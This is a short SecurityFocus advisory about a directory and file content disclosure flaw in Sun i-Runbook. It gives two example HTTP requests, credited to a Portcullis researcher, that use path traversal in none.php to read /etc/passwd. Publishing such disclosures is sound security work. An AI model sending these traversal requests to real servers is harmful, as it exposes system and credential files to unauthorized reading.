Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Sun i-Runbook Directory And File Content Disclosure Vulnerability

JWC@portcullis-security.com has provided the following example http requests:

http://<Serverip:port>/content/base/build/explorer/none.php?..:..:..:..:..:.
.:..:etc:passwd:

or

http://<Serverip:port>/content/base/build/explorer/none.php?/etc/passwd







 

Privacy Statement
Copyright 2008, SecurityFocus